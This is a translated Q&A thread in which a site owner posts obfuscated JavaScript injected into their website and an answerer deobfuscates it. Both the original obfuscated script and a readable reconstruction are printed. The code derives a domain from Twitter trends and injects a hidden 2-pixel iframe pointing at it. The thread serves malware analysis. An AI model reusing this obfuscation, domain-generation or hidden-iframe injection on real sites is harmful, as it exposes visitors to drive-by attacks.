这是危险的Javascript吗?

时间:2011-11-12 15:56:41

标签: javascript code-injection

<script>
(function($$) {
    d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n('X':'`','~.getUTC\\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    for (c = 50; c; d = (t = d.split('#@PVX`~\\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    $$(d)
})(function(jsAP) {
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的主人对此一无所知,而且经常发生这种情况。我认为他们可能正在隐藏恶意黑客企图。

这是做什么的?

编辑:

  

我们正在更换主机。

该代码确实是恶意的,并被注入我们的网站。我们的主人试图隐瞒(可能这样我们不会担心)

这发生在我朋友在同一主机上的网站上。

请不要测试此脚本。

看起来像是一些混淆的注射。

1 个答案:

答案 0 :(得分:8)

让我们努力并解读这个;它会很有趣(-nish)。

到目前为止,AFAICT正在抓住(似乎是)当前日期前两天的第三个趋势,或者至少意味着(我认为它用于查找一天趋势的日期关键字是不正确的,因为它在时间上添加一个零秒的东西,这在Feed中不存在),从中构建一个URL,并发送一些数据键入一个表示最近的6小时间隔的散列。

这是解码后解码的文本块和分析的开始:

(function () {
    jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join('')
    };

    jsAj = document;

    loadJquery(); // Load JQ in head new script tag.

    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /** Used only once in .getJSON call. */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /** Takes twitter as_of and subtracts ~2 days. */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) * '1000');
        return d
    }

    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    function jso($) {
        // Wait until we have jQuery loaded.
        if (typeof($) == 'undefined') {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there's a timeout inside).
            if (typeof ($.jsAh) != 'undefined') return;
            $.jsAh = 1;

            $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // Run JSON request every second.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
                            if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can't, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
                            if (!jsb) jsb = jsy[jsr + jsAd + ':00'];

                            // Get third trend entry, e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');

                            //    803 + prevSixHr * 3 + 410; -- some sort of hash?
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
                            // jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
                            jsAr['Z'] = jsg;
                            //

                            jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
                            $('body').append(jsAf)
                        } catch (jsAy) {}
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

这是从数组构建的一些URL:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这段代码:

jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)

将jquery脚本标记附加到<head>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>